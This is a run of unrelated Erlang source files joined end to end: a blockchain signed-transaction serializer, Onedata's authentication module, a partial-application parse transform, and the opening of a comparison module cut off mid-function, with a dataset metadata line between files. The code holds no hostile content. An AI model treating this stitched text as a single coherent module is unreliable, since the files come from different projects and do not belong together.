            ?SIG_TX_VSN,
            serialization_template(?SIG_TX_VSN),
            SignedTxBin),
    #signed_tx{ tx = dsdtx:deserialize_from_binary(TxBin)
              , signatures = Sigs
              }.

%% Field layout of the signed-tx envelope for the given version.
serialization_template(?SIG_TX_VSN) ->
    [ {signatures, [binary]}
    , {transaction, binary}
    ].
%% @doc Client serialization for a transaction included in a block: the
%% block height and hash are derived from the given header.
-spec serialize_for_client(json|message_pack, #header{}, dsdtx_sign:signed_tx()) ->
    binary() | map().
serialize_for_client(Encoding, Header, #signed_tx{}=S) ->
    {ok, BlockHash} = dsdc_headers:hash_header(Header),
    serialize_for_client(Encoding, S, dsdc_headers:height(Header), BlockHash,
                         hash(S)).

%% @doc Client serialization for a pending (not yet mined) transaction:
%% height -1 and an empty block hash mark the absence of a block.
-spec serialize_for_client_pending(json|message_pack, dsdtx_sign:signed_tx()) ->
    binary() | map().
serialize_for_client_pending(Encoding, #signed_tx{}=S) ->
    serialize_for_client(Encoding, S, -1, <<>>, hash(S)).
%% @doc Serializes a signed transaction plus its block metadata for
%% client consumption, either as a base58c-encoded msgpack binary or as
%% a JSON-ready map. The block-hash encoding (empty hash of a pending tx
%% becomes the literal <<"none">>) was duplicated in both clauses and is
%% now shared via encode_block_hash/1.
serialize_for_client(message_pack, #signed_tx{}=S, BlockHeight, BlockHash0,
                     TxHash) ->
    MetaData = [#{<<"block_height">> => BlockHeight},
                #{<<"block_hash">> => encode_block_hash(BlockHash0)},
                #{<<"hash">> => dsdc_base58c:encode(tx_hash, TxHash)}],
    TxBin = serialize_to_binary(S),
    Payload = [?SIG_TX_TYPE,
               ?SIG_TX_VSN,
               #{<<"tx">> => dsdc_base58c:encode(transaction, TxBin)},
               MetaData
              ],
    dsdc_base58c:encode(transaction, msgpack:pack(Payload));
serialize_for_client(json, #signed_tx{tx = Tx, signatures = Sigs},
                     BlockHeight, BlockHash0, TxHash) ->
    #{<<"tx">> => dsdtx:serialize_for_client(Tx),
      <<"block_height">> => BlockHeight,
      <<"block_hash">> => encode_block_hash(BlockHash0),
      <<"hash">> => dsdc_base58c:encode(tx_hash, TxHash),
      <<"signatures">> => [dsdc_base58c:encode(signature, Sig) || Sig <- Sigs]}.

%% @private A pending transaction carries an empty block hash; encode it
%% as the literal <<"none">>, otherwise base58c-encode the real hash.
encode_block_hash(<<>>) -> <<"none">>;
encode_block_hash(BlockHash) -> dsdc_base58c:encode(block_hash, BlockHash).
%% @doc Extracts block metadata (height, block hash, tx hash) from a
%% client-serialized transaction, for both supported encodings. Crashes
%% (badmatch) if the input lacks any of the expected fields.
%% NOTE: the trailing extraction residue previously fused to the last
%% line of this function has been removed.
meta_data_from_client_serialized(message_pack, Bin) ->
    {transaction, MsgPackBin} = dsdc_base58c:decode(Bin),
    {ok, [_Type, _Version, _TxSer, GenericData]} = msgpack:unpack(MsgPackBin),
    [#{<<"block_height">> := BlockHeight},
     #{<<"block_hash">> := BlockHashEncoded},
     #{<<"hash">> := TxHashEncoded}] = GenericData,
    {block_hash, BlockHash} = dsdc_base58c:decode(BlockHashEncoded),
    {tx_hash, TxHash} = dsdc_base58c:decode(TxHashEncoded),
    #{block_height => BlockHeight,
      block_hash => BlockHash,
      hash => TxHash};
meta_data_from_client_serialized(json, Serialized) ->
    #{<<"tx">> := _EncodedTx,
      <<"block_height">> := BlockHeight,
      <<"block_hash">> := BlockHashEncoded,
      <<"hash">> := TxHashEncoded,
      <<"signatures">> := _Sigs} = Serialized,
    {block_hash, BlockHash} = dsdc_base58c:decode(BlockHashEncoded),
    {tx_hash, TxHash} = dsdc_base58c:decode(TxHashEncoded),
    #{block_height => BlockHeight,
      block_hash => BlockHash,
      hash => TxHash}.
%%%-------------------------------------------------------------------
%%% @author <NAME>
%%% @copyright (C) 2019 ACK CYFRONET AGH
%%% This software is released under the MIT license
%%% cited in 'LICENSE.txt'.
%%% @end
%%%-------------------------------------------------------------------
%%% @doc
%%% This module includes some common functions and types related to AAI in Onedata.
%%% AAI stands for Authentication and Authorization Infrastructure.
%%% AAI in Onedata assumes the approach of IBAC (Identity Based Access Control).
%%% This means that authorization to perform certain operations is based on
%%% the client's identity (represented by #subject{} in Onedata) and other
%%% attributes of the resources (privileges, existing relations, token caveats).
%%%
%%% Onedata uses tokens to carry client's identity and possibly some contextual
%%% confinements taken into account during authorization. They have the following
%%% characteristics:
%%% * each token is issued for a certain subject - user or Oneprovider
%%% * tokens allow to perform operations on behalf of the subject - authority
%%% delegation can be easily achieved by passing the token to another party
%%% * tokens can have contextual confinements which all must be satisfied
%%% during request authorization
%%% * tokens are represented by the #token{} record
%%% * tokens are implemented using the macaroons library
%%%
%%% The #auth{} object is used universally as the successful result of client
%%% *authentication*, not only regarding Onedata tokens, but also basic auth or
%%% third party tokens. It carries the client's identity (#subject{}) and other
%%% contextual information that is later used for *authorization*, for example
%%% the IP of the client or contextual caveats that were included in the
%%% presented token.
%%%
%%% There are three types of tokens:
%%% * access token - carries subject's authentication and authorization to
%%% perform certain operations. Can be linked to specific user's session.
%%% * identity token - can be used only for identity verification (does not
%%% carry any authorization).
%%% * invite token - used to create relations in the system by inviting
%%% users or providers to join an entity.
%%%
%%% In order to verify a token, it is required to collect the request context,
%%% against which the token caveats are checked. The context is expressed using
%%% the #auth_ctx{} record. It consists of:
%%% * current timestamp
%%% * scope (unlimited or identity_token) stating what level of authorization
%%% is required from the token
%%% (@todo VFS-6098 to be removed in the next major version)
%%% * peer IP from which the request has been made
%%% * interface to which the client has connected
%%% * service in which the token was used (described below)
%%% * consumer - token bearer that consumes the token (described below)
%%% * data_access_caveats_policy - information if data access caveats are
%%% allowed in the context of this request (see data_access_caveats module)
%%% * group_membership_checker - callback to check group membership
%%%
%%% The service in which the token was used (i.e. service which received the
%%% request from a client) is denoted by the #service_spec{} record. The service
%%% that tries to authorize an operation with a token on behalf of a subject can
%%% present its authentication by sending its identity token in the the
%%% x-onedata-service-token header, or perform the operation on a private
%%% channel (GraphSync). If the service does not authenticate itself, it defaults
%%% to undefined. The token may include a cv_service caveat - in this case,
%%% the service must be whitelisted in the caveat for the request to succeed.
%%%
%%% The request consumer is the token bearer that consumes the token - either a
%%% user or a ?ONEPROVIDER service, expressed using the #subject{} record. The
%%% consumer can authenticate themselves by sending its identity token in the
%%% the x-onedata-consumer-token header, or perform the operation on a private
%%% channel (GraphSync). Otherwise, the consumer defaults to undefined. The
%%% token may include a cv_consumer caveat - in this case, the consumer must be
%%% whitelisted in the caveat for the request to succeed.
%%%
%%% ?ONEPROVIDER access tokens are a specific case where the serialized form can
%%% have a three letter indicator of service type that is authorizing itself
%%% (op-worker or op-panel), e.g. opw-MDax34Gh5TyOP032... It is added using the
%%% tokens:add_oneprovider_service_indication/2 function (consult for details). This
%%% is merely an indication for Onezone which of the services has authenticated,
%%% as both services use the same access token.
%%% @end
%%%-------------------------------------------------------------------
-module(aai).
-author("<NAME>").
-include("aai/aai.hrl").
-include("onedata.hrl").
-type subject() :: #subject{}.
% Tokens can be issued only for a user or ?ONEPROVIDER subject - this means that
% clients are able to authenticate themselves only as a user or Oneprovider.
% Other subject types are used in internal application logic:
% * The 'root' subject is authorized to do everything and must be used with caution.
% * The 'group' subject is used in cv_consumer caveats to allow token consumption
% for any member of specified group
-type subject_type() :: nobody | root | user | group | ?ONEPROVIDER.
% Applicable only in case of ?ONEPROVIDER type to differentiate between
% ?OP_WORKER and ?OP_PANEL services, that both use the same access token
-type subject_subtype() :: undefined | ?OP_WORKER | ?OP_PANEL.
% Applicable in case of user, group or ?ONEPROVIDER type
-type subject_id() :: undefined | binary().
% Special wildcard id <<"*">> can be used to match any id in a service
-type service_spec() :: #service_spec{}.
% Consumers are expressed using the subject record. This type is introduced for
% clearer code and semantics. Special wildcard id <<"*">> can be used to match
% any id in a consumer.
-type consumer_spec() :: subject().
% Can be undefined if the auth object is not related to any session
-type session_id() :: undefined | binary().
-type group_membership_checker() :: fun((subject(), GroupId :: gri:entity_id()) -> boolean()).
-type auth() :: #auth{}.
-type auth_ctx() :: #auth_ctx{}.
-export_type([subject/0, subject_type/0, subject_subtype/0, subject_id/0]).
-export_type([service_spec/0, consumer_spec/0]).
-export_type([session_id/0]).
-export_type([group_membership_checker/0]).
-export_type([auth/0, auth_ctx/0]).
%%% API
-export([root_auth/0, nobody_auth/0, user_auth/1]).
-export([normalize_subject/1]).
-export([subject_to_json/1, subject_from_json/1]).
-export([serialize_subject/1, deserialize_subject/1]).
-export([service_to_json/1, service_from_json/1]).
-export([serialize_service/1, deserialize_service/1]).
-export([auth_to_printable/1]).
-export([subject_to_printable/1]).
-export([service_to_printable/1]).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Returns the Auth object representing ROOT authorization
%% (allowed to perform all operations). ?ROOT expands to an #auth{}
%% record (defined in aai.hrl) with the root subject.
%% @end
%%--------------------------------------------------------------------
-spec root_auth() -> auth().
root_auth() ->
    ?ROOT.

%%--------------------------------------------------------------------
%% @doc
%% Returns the Auth object representing NOBODY authorization
%% (allowed only to perform publicly available operations).
%% @end
%%--------------------------------------------------------------------
-spec nobody_auth() -> auth().
nobody_auth() ->
    ?NOBODY.

%%--------------------------------------------------------------------
%% @doc
%% Returns the Auth object representing USER authorization for given UserId.
%% @end
%%--------------------------------------------------------------------
-spec user_auth(UserId :: subject_id()) -> auth().
user_auth(UserId) ->
    ?USER(UserId).
%%--------------------------------------------------------------------
%% @doc
%% Ensures that the subject represents an identity of an external actor in the
%% system - user, Oneprovider or nobody (a.k.a. guest or anonymous). Transforms
%% other subjects that are valid only in internal application logic
%% (root, group) to nobody, so internal identities never leak outside.
%% @end
%%--------------------------------------------------------------------
-spec normalize_subject(aai:subject()) -> aai:subject().
normalize_subject(?SUB(user, UserId)) -> ?SUB(user, UserId);
normalize_subject(?SUB(?ONEPROVIDER, PrId)) -> ?SUB(?ONEPROVIDER, PrId);
normalize_subject(_) -> ?SUB(nobody).
%% @doc Converts a subject to its JSON representation: a map with
%% "type" and "id" keys. Fails with badarg for unrecognized subjects.
-spec subject_to_json(subject()) -> json_utils:json_term().
subject_to_json(?SUB(nobody)) ->
    #{<<"type">> => <<"nobody">>, <<"id">> => null};
% root subject must not have a representation outside of the application,
% so it is deliberately rendered the same as nobody
subject_to_json(?SUB(root)) ->
    #{<<"type">> => <<"nobody">>, <<"id">> => null};
subject_to_json(?SUB(user, UserId)) ->
    #{<<"type">> => <<"user">>, <<"id">> => UserId};
subject_to_json(?SUB(group, GroupId)) ->
    #{<<"type">> => <<"group">>, <<"id">> => GroupId};
subject_to_json(?SUB(?ONEPROVIDER, PrId)) ->
    #{<<"type">> => <<"oneprovider">>, <<"id">> => PrId};
subject_to_json(_) ->
    error(badarg).

%% @doc Inverse of subject_to_json/1 (root cannot be recovered - it
%% round-trips to nobody). Fails with badarg on unrecognized input.
-spec subject_from_json(json_utils:json_term()) -> subject().
subject_from_json(#{<<"type">> := <<"nobody">>, <<"id">> := null}) ->
    ?SUB(nobody);
subject_from_json(#{<<"type">> := <<"user">>, <<"id">> := UserId}) ->
    ?SUB(user, UserId);
subject_from_json(#{<<"type">> := <<"group">>, <<"id">> := GroupId}) ->
    ?SUB(group, GroupId);
subject_from_json(#{<<"type">> := <<"oneprovider">>, <<"id">> := PrId}) ->
    ?SUB(?ONEPROVIDER, PrId);
subject_from_json(_) ->
    error(badarg).
%% @doc Serializes a subject to a compact binary with a 3-letter type
%% prefix (usr-/grp-/prv-) or the literal <<"nobody">>.
-spec serialize_subject(subject()) -> binary().
serialize_subject(?SUB(nobody)) -> <<"nobody">>;
% root subject must not have a representation outside of the application
serialize_subject(?SUB(root)) -> <<"nobody">>;
serialize_subject(?SUB(user, UserId)) -> <<"usr-", UserId/binary>>;
serialize_subject(?SUB(group, GroupId)) -> <<"grp-", GroupId/binary>>;
serialize_subject(?SUB(?ONEPROVIDER, Provider)) -> <<"prv-", Provider/binary>>;
serialize_subject(_) -> error(badarg).

%% @doc Inverse of serialize_subject/1; fails with badarg on input that
%% does not carry a recognized prefix.
-spec deserialize_subject(binary()) -> subject().
deserialize_subject(<<"nobody">>) -> ?SUB(nobody);
deserialize_subject(<<"usr-", UserId/binary>>) -> ?SUB(user, UserId);
deserialize_subject(<<"grp-", GroupId/binary>>) -> ?SUB(group, GroupId);
deserialize_subject(<<"prv-", Provider/binary>>) -> ?SUB(?ONEPROVIDER, Provider);
deserialize_subject(_) -> error(badarg).
%% @doc Converts a service spec to a JSON map with "type" and "id" keys;
%% fails with badarg for unrecognized services.
-spec service_to_json(service_spec()) -> json_utils:json_term().
service_to_json(?SERVICE(?OZ_WORKER, Id)) -> #{<<"type">> => <<"oz_worker">>, <<"id">> => Id};
service_to_json(?SERVICE(?OZ_PANEL, Id)) -> #{<<"type">> => <<"oz_panel">>, <<"id">> => Id};
service_to_json(?SERVICE(?OP_WORKER, Id)) -> #{<<"type">> => <<"op_worker">>, <<"id">> => Id};
service_to_json(?SERVICE(?OP_PANEL, Id)) -> #{<<"type">> => <<"op_panel">>, <<"id">> => Id};
service_to_json(_) -> error(badarg).

%% @doc Inverse of service_to_json/1; fails with badarg on bad input.
-spec service_from_json(json_utils:json_term()) -> service_spec().
service_from_json(#{<<"type">> := <<"oz_worker">>, <<"id">> := Id}) -> ?SERVICE(?OZ_WORKER, Id);
service_from_json(#{<<"type">> := <<"oz_panel">>, <<"id">> := Id}) -> ?SERVICE(?OZ_PANEL, Id);
service_from_json(#{<<"type">> := <<"op_worker">>, <<"id">> := Id}) -> ?SERVICE(?OP_WORKER, Id);
service_from_json(#{<<"type">> := <<"op_panel">>, <<"id">> := Id}) -> ?SERVICE(?OP_PANEL, Id);
service_from_json(_) -> error(badarg).

%% @doc Serializes a service spec as "<3-letter-shortname>-<id>".
-spec serialize_service(service_spec()) -> binary().
serialize_service(?SERVICE(Type, Id)) ->
    <<(onedata:service_shortname(Type))/binary, "-", Id/binary>>.

%% @doc Inverse of serialize_service/1; the shortname is fixed-width
%% (3 bytes), so the binary pattern can split it off directly.
-spec deserialize_service(binary()) -> service_spec().
deserialize_service(<<Type:3/binary, "-", Id/binary>>) ->
    ?SERVICE(onedata:service_by_shortname(Type), Id);
deserialize_service(_) ->
    error(badarg).
%% @doc Human-readable rendering of an auth object, for logs and errors.
-spec auth_to_printable(auth()) -> string().
auth_to_printable(?NOBODY) -> "nobody (unauthenticated client)";
auth_to_printable(?ROOT) -> "root";
auth_to_printable(?USER(UId)) -> str_utils:format("user:~s", [UId]);
auth_to_printable(?PROVIDER(PId)) -> str_utils:format("provider:~s", [PId]).

%% @doc Human-readable rendering of a subject as "type:id".
-spec subject_to_printable(subject()) -> string().
subject_to_printable(?SUB(Type, Id)) -> str_utils:format("~s:~s", [Type, Id]).
%% @doc Human-readable rendering of a service spec as "type:id".
%% (Trailing extraction residue previously fused to this line removed.)
-spec service_to_printable(service_spec()) -> string().
service_to_printable(?SERVICE(Type, Id)) -> str_utils:format("~s:~s", [Type, Id]).
%%%-------------------------------------------------------------------
%%% @doc
%%% A parse transform implementing partial function application.
%%%
%%% To enable, add to the top of your module:
%%%
%%% ```
%%% -compile({parse_transform, partial}).
%%% '''
%%%
%%% This will enable compile time conversion of calls to
%%% `partial:cut/1' and `partial:cute/1' into partial function
%%% application of the contained function. `_' is used as a marker for
%%% the unevaluated slot(s) in the contained function.
%%%
%%% With `partial:cut/1', the arguments to the called function are
%%% evaluated when the returned function is applied. With
%%% `partial:cute/1', the arguments are evaluated when the function is
%%% constructed.
%%%
%%% Additionally, a compile option can be specified via erlc options
%%% or by adding to the top of your module:
%%%
%%% ```
%%% -compile(partial_allow_local).
%%% '''
%%%
%%% To enable transforming `cut/1' and `cute/1' the same as the fully
%%% qualified names.
%%% @end
%%%-------------------------------------------------------------------
-module(partial).
% Manually enable debugging. Should usually just use a compiler flag,
% though. Is quite verbose.
% -define(PARTIAL_DEBUG, true).
-ifdef(PARTIAL_DEBUG).
-define(IF_DEBUG(Expression), Expression).
-else.
-define(IF_DEBUG(Expression), (ok)).
-endif.
%% API
-export([cut/1,
cute/1,
parse_transform/2]).
-record(cut, {variables=[], arguments=[]}).
-record(cute, {variables=[], matches=[], arguments=[]}).
-include_lib("syntax_tools/include/merl.hrl").
%%%===================================================================
%%% API
%%%===================================================================
%% @doc
%% A dummy function used as a marker by `parse_transform/2' to convert
%% calls to functions to partially applied functions. The special
%% variable `_' is used as a marker for unevaluated arguments, as it
%% is usually illegal to use on the right hand side of a match.
%%
%% All arguments are evaluated when the partially applied function is
%% called.
%%
%% The parse transform is only able to detect and rewrite simple
%% literal calls to this function. Other uses (e.g. apply/3) will result
%% in an error being thrown at runtime.
%% @end
%% @see parse_transform/2
cut(_Fun) ->
    missing_parse_transform().

%% @doc
%% A dummy function used as a marker by `parse_transform/2' to convert
%% calls to functions to partially applied functions. The special
%% variable `_' is used as a marker for unevaluated arguments, as it
%% is usually illegal to use on the right hand side of a match.
%%
%% Given arguments are evaluated when the partially applied function
%% is constructed. This can be used as an easy way to cache expensive
%% computation in a closure.
%%
%% The parse transform is only able to detect and rewrite simple
%% literal calls to this function. Other uses (e.g. apply/3) will result
%% in an error being thrown at runtime.
%% @end
%% @see parse_transform/2
cute(_Fun) ->
    missing_parse_transform().
%% @doc
%% A parse transformation function which converts calls to special
%% dummy functions in this module (cut/1, cute/1).
%%
%% Add this compile attribute to the top of any module to enable:
%% ```
%% -compile({parse_transform, partial}).
%% '''
%%
%% Or globally enable by adding as a compiler flag (probably in your
%% rebar.config file).
%%
%% Options are gathered both from the compiler invocation and from the
%% file's own -compile attributes; file-level options win (see
%% merge_options/2).
%% @end
-spec parse_transform(Forms, Options) -> NewForms when
      Forms :: [erl_parse:abstract_form() | erl_parse:form_info()],
      Options :: [compile:option()],
      NewForms :: [erl_parse:abstract_form() | erl_parse:form_info()].
parse_transform(Forms, Options) ->
    GlobalOptions = parse_options(Options),
    FileOptions = parse_compile_attributes(Forms),
    MergedOptions = merge_options(GlobalOptions, FileOptions),
    ?IF_DEBUG(ok = io:format(
                     "partial:parse_transform/2 options:~n~p~n",
                     [MergedOptions])),
    transform_forms(Forms, MergedOptions).
%%%===================================================================
%%% Internal Functions
%%%===================================================================
%% @private
%% @doc Raised when cut/1 or cute/1 is actually evaluated at runtime,
%% meaning the parse transform did not rewrite the call site (either the
%% transform is not enabled, or the call was indirect, e.g. via apply/3).
%% Fix: the message previously referenced a non-existent
%% partial:parse_trans/2; it now names parse_transform/2 correctly.
missing_parse_transform() ->
    throw({missing_parse_transform,
           "This function requires that the partial:parse_transform/2 "
           "function be listed as a parse transformation for your "
           "module as \"-compile({parse_transform, partial}).\" "
           "If that is already true, this function has been called "
           "indirectly in a way the parse transform can not "
           "recognize, such as via apply/3."}).
%% @private
%% @doc Extracts the partial_allow_local option from a compiler option
%% list (a bare atom in the list reads as true via proplists). Only
%% true, false or absent (undefined) are legal; anything else raises
%% {invalid_compile_option, Message}.
parse_options(Options) ->
    ?IF_DEBUG(ok = io:format(
                     "partial:parse_options/2 options:~n~p~n",
                     [Options])),
    AllowLocal = proplists:get_value(partial_allow_local, Options),
    ok = case lists:member(AllowLocal, [true, false, undefined]) of
             true ->
                 ok;
             false ->
                 Message = lists:flatten(
                             io_lib:format(
                               "Value for compiler option partial_allow_local "
                               "must be a boolean, but value was: ~w",
                               [AllowLocal])),
                 error({invalid_compile_option, Message})
         end,
    #{allow_local=>AllowLocal}.
%% @private
%% @doc Collects the payloads of all -compile(...) attributes in the
%% module's forms into a single flat list. Single-term attributes are
%% wrapped in a list so list and non-list payloads merge uniformly;
%% forms that are not -compile attributes are filtered out by the
%% generator's ?Q pattern match.
compile_attributes(Forms) ->
    Attributes = [begin
                      Attribute = erl_syntax:concrete(Args),
                      case is_list(Attribute) of
                          true ->
                              Attribute;
                          false ->
                              [Attribute]
                      end
                  end ||
                     Form <- Forms,
                     {match, Args} <- [case Form of
                                           ?Q("-compile('@Args').") ->
                                               {match, Args};
                                           _ ->
                                               undefined
                                       end]],
    lists:append(Attributes).

%% @private
%% @doc Parses options declared via in-file -compile attributes, using
%% the same validation as compiler-supplied options.
parse_compile_attributes(Forms) ->
    Attributes = compile_attributes(Forms),
    parse_options(Attributes).
%% @private
%% @doc
%% We parse options from the compiler and from the file being
%% compiled. If an option is only given in one place, use that. If
%% given in both places the file overrides the global option. When
%% neither source sets the option it defaults to false.
%% @end
-spec merge_options(GlobalOptions, FileOptions) -> Options when
      GlobalOptions :: #{allow_local:=undefined | boolean()},
      FileOptions :: #{allow_local:=undefined | boolean()},
      Options :: #{allow_local:=boolean()}.
merge_options(#{allow_local:=Global}, #{allow_local:=File}) ->
    %% Collapses the previous nine hand-enumerated clauses into one
    %% truth table: file setting wins when present, otherwise fall back
    %% to the global setting, otherwise default to false.
    AllowLocal = case {Global, File} of
                     {undefined, undefined} -> false;
                     {_, undefined} -> Global;
                     {_, _} -> File
                 end,
    #{allow_local => AllowLocal}.
%% @private
%% @doc Maps transform/3 over every subtree of every form.
transform_forms(Forms, Options) ->
    % If any errors occurred, we replace the entire form with them.
    % This allows the standard compiler chain to pick them up as if
    % they were erl_parse errors and display a standard error message
    % to the user instead of a traceback.
    Transform = fun (Form, Errors) ->
                        transform(Form, Errors, Options)
                end,
    erl_syntax:revert_forms(
      lists:append(
        [case erl_syntax_lib:mapfold(Transform, [], Form) of
             {Transformed, []} ->
                 [Transformed];
             {_Transformed, Errors} ->
                 Errors
         end || Form <- Forms])).

%% @private
%% @doc Rewrites a single subtree: literal calls to partial:cut/1 and
%% partial:cute/1 (and their unqualified forms when allow_local is set)
%% are replaced by generated fun expressions; every other form passes
%% through unchanged. Rewrite failures are accumulated as error markers.
transform(Form, Errors, Options) ->
    Line = erl_syntax:get_pos(Form),
    Transformed = case Form of
        ?Q("partial:cut(_@@Args)") ->
            cut_function(Line, Args);
        ?Q("cut(_@@Args)") ->
            case Options of
                #{allow_local:=true} ->
                    cut_function(Line, Args);
                _ ->
                    {ok, Form}
            end;
        ?Q("partial:cute(_@@Args)") ->
            cute_function(Line, Args);
        ?Q("cute(_@@Args)") ->
            case Options of
                #{allow_local:=true} ->
                    cute_function(Line, Args);
                _ ->
                    {ok, Form}
            end;
        _ ->
            {ok, Form}
    end,
    case Transformed of
        {ok, NewForm} ->
            {NewForm, Errors};
        {error, Error} ->
            {Form, [Error | Errors]}
    end.

%% @private
%% @doc Builds an error marker that the compiler reports like a regular
%% erl_parse error at the given line.
transform_error(Line, Message) ->
    % I'm probably abusing the error system by using erl_parse here,
    % but it allows my errors to show up as usual in the compiler
    % output.
    Prefix = "Error: In partial:parse_transform/2, ",
    {error, erl_syntax:error_marker({Line, erl_parse, Prefix ++ Message})}.
%% @private
%% @doc Reverses the accumulated lists in a #cut{} or #cute{} record;
%% used because the folds in cuts/3 and cutes/3 prepend for efficiency.
reverse(#cut{} = Cut) ->
    #cut{variables=lists:reverse(Cut#cut.variables),
         arguments=lists:reverse(Cut#cut.arguments)};
reverse(#cute{} = Cute) ->
    #cute{variables=lists:reverse(Cute#cute.variables),
          matches=lists:reverse(Cute#cute.matches),
          arguments=lists:reverse(Cute#cute.arguments)}.

%% @private
%% @doc True if the form is the wildcard variable `_' marking an
%% unevaluated argument slot.
is_cut_variable(Var) ->
    case Var of
        ?Q("_") ->
            true;
        _ ->
            false
    end.

%% @private
%% @doc Generates a unique variable name for a synthesized argument.
%% NOTE: this creates a fresh atom per call (make_ref/0 makes each name
%% unique); acceptable because it only runs at compile time.
variable_name(Type) ->
    Name = io_lib:format("PartialArgument_~s_~w", [Type, make_ref()]),
    erlang:list_to_atom(lists:flatten(Name)).

%% @private
%% @doc Builds a variable syntax node with the given source line.
variable(Line, Type) ->
    erl_syntax:set_pos(erl_syntax:variable(variable_name(Type)), Line).
name([Name]) ->
[Name];
name([Module, Function]) ->
?Q("_@Module:_@Function").
split_name(Name) ->
case Name of
?Q("_@Module:_@Function") ->
[Module, Function];
_ ->
[Name]
end.
match(Line, Type, Form) ->
Pattern = variable(Line, Type),
Match = merl:qquote(Line,
"_@pattern = _@form",
[{pattern, Pattern}, {form, Form}]),
{Pattern, Match}.
cuts(Line, Type, Forms) ->
reverse(lists:foldl(
fun (Form, #cut{} = Acc) ->
case is_cut_variable(Form) of
true ->
Variable = variable(Line, Type),
Acc#cut{variables=[Variable | Acc#cut.variables],
arguments=[Variable | Acc#cut.arguments]};
false ->
Acc#cut{arguments=[Form | Acc#cut.arguments]}
end
end,
#cut{},
Forms)).
name_cuts(Line, Name) ->
Parts = split_name(Name),
Cut = cuts(Line, name, Parts),
Cut#cut{arguments=name(Cut#cut.arguments)}.
cutes(Line, Type, Forms) ->
reverse(lists:foldl(
fun (Form, #cute{} = Acc) ->
case {is_cut_variable(Form), erl_syntax:is_literal(Form)} of
{true, false} ->
Variable = variable(Line, Type),
Acc#cute{variables=[Variable | Acc#cute.variables],
arguments=[Variable | Acc#cute.arguments]};
{false, true} ->
Acc#cute{arguments=[Form | Acc#cute.arguments]};
{false, false} ->
{Variable, Match} = match(Line, Type, Form),
Acc#cute{matches=[Match | Acc#cute.matches],
arguments=[Variable | Acc#cute.arguments]}
end
end,
#cute{},
Forms)).
name_cutes(Line, Name) ->
Parts = split_name(Name),
Cute = cutes(Line, name, Parts),
Cute#cute{arguments=name(Cute#cute.arguments)}.
%% @private
%% @doc
%% Transform the AST for:
%%
%% F = partial:cut(f(_, x, y, z)).
%%
%% into:
%%
%% F = fun (Arg1) ->
%% f(Arg1, x, y, z)
%% end.
%% @end
cut_function(MarkerLine, [MarkerArgument])->
case MarkerArgument of
?Q("_@Name(_@@Args)") ->
?IF_DEBUG(ok = io:format(
"partial:cut_function/2 Original:~n~p~n",
[MarkerArgument])),
Line = erl_syntax:get_pos(MarkerArgument),
NameCut = name_cuts(Line, Name),
Cut = cuts(Line, cut, Args),
CutFun = merl:qquote(Line,
"fun (_@@variables) ->"
" _@name(_@@arguments)"
" end",
[{variables, NameCut#cut.variables ++ Cut#cut.variables},
{name, NameCut#cut.arguments},
{arguments, Cut#cut.arguments}]),
?IF_DEBUG(ok = io:format(
"partial:cut_function/2 Transformed:~n~p~n",
[CutFun])),
{ok, CutFun};
_ ->
transform_error(
MarkerLine,
"partial:cut/1 requires a function call as an argument")
end;
cut_function(MarkerLine, MarkerArguments) ->
transform_error(
MarkerLine,
io_lib:format(
"partial:cut/1 requires a single argument, got ~b",
[length(MarkerArguments)])).
%% @private
%% @doc
%% Transform the AST for:
%%
%% F = partial:cute(f(_, x, y, z)).
%%
%% into:
%%
%% F = (fun () ->
%% Arg2 = x,
%% Arg3 = y,
%% Arg4 = z,
%% fun (Arg1) ->
%% f(Arg1, Arg2, Arg3, Arg4)
%% end
%% end)().
%% @end
cute_function(MarkerLine, [MarkerArgument])->
case MarkerArgument of
?Q("_@Name(_@@Args)") ->
?IF_DEBUG(ok = io:format(
"partial:cute_function/2 Original:~n~p~n",
[MarkerArgument])),
Line = erl_syntax:get_pos(MarkerArgument),
NameCute = name_cutes(Line, Name),
Cute = cutes(Line, cute, Args),
CuteFun = merl:qquote(Line,
"(fun () ->"
" _@@matches,"
" fun (_@@variables) -> _@name(_@@arguments) end"
" end)()",
[{matches, NameCute#cute.matches ++ Cute#cute.matches},
{variables, NameCute#cute.variables ++ Cute#cute.variables},
{name, NameCute#cute.arguments},
{arguments, Cute#cute.arguments}]),
?IF_DEBUG(ok = io:format(
"partial:cute_function/2 Transformed:~n~p~n",
[CuteFun])),
{ok, CuteFun};
_ ->
transform_error(
MarkerLine,
"partial:cute/1 requires a function call as an argument")
end;
cute_function(MarkerLine, MarkerArguments)->
transform_error(
MarkerLine,
io_lib:format(
"partial:cute/1 requires a single argument, got ~b",
[length(MarkerArguments)])). | src/partial.erl | 0.517083 | 0.556159 | partial.erl | starcoder |
%%This file is licensed under the terms of the Modified BSD License.
-module(cmp).
-export([eq/2,le/2,ge/2,gt/2,lt/2]).
%% Wrapper for comparison functions
%% Needs special care in comparing rationals and int and rationals
eq({N,D},I) when is_integer(N),is_integer(D),is_integer(I) ->
eq({N,D},{I,1});
eq(I,{N,D}) when is_integer(N),is_integer(D),is_integer(I) ->
eq({I,1},{N,D});
eq({N,D},{N1,D1}) when is_integer(N),is_integer(D),is_integer(N1),is_integer(D1)->
rationals:proper({N,D})==rationals:proper({N1,D1});
eq({}, {}) -> true;
eq({A}, {B}) when is_tuple(A), is_tuple(B) -> eq(A, B);
eq(A, B) when is_tuple(A), is_tuple(B) ->
%% tuples representing rational numbers are handled above
eq(tuple_to_list(A), tuple_to_list(B));
eq([], []) -> true;
eq([_A | _RA], []) -> false;
eq([], [_B | _RB]) -> false;
eq([A | RA], [B | RB]) ->
eq(A, B) andalso eq(RA, RB);
eq(A,B)->
A==B.
%% If Abstract DataTypes are checked, those without arguments are not represented as tuples but as atoms
%% The rule says that the constructor name should be compared so, those names need to be compared (which is the atom itself and the first element of the tuple)
gt({N,D},I) when is_integer(N),is_integer(D),is_integer(I) ->
gt({N,D},{I,1});
gt(I,{N,D}) when is_integer(N),is_integer(D),is_integer(I) ->
gt({I,1},{N,D});
gt({N,D},{N1,D1}) when is_integer(N),is_integer(D),is_integer(N1),is_integer(D1)->
rationals:is_greater({N,D},{N1,D1});
%% As we loop through rest of tuple elements, in case we only compare one
%% remaining element we go into the tuple
gt({}, {}) -> false;
gt({A},{B}) when is_tuple(A),is_tuple(B)->
gt(A,B);
gt(A,B) when is_tuple(A),is_tuple(B)->
gt(tuple_to_list(A), tuple_to_list(B));
gt(A,T) when is_atom(A),is_tuple(T)->
A>element(1,T);
gt(T,A) when is_atom(A),is_tuple(T)->
element(1,T)>A;
gt([A | RA], [B | RB]) ->
case eq(A, B) of
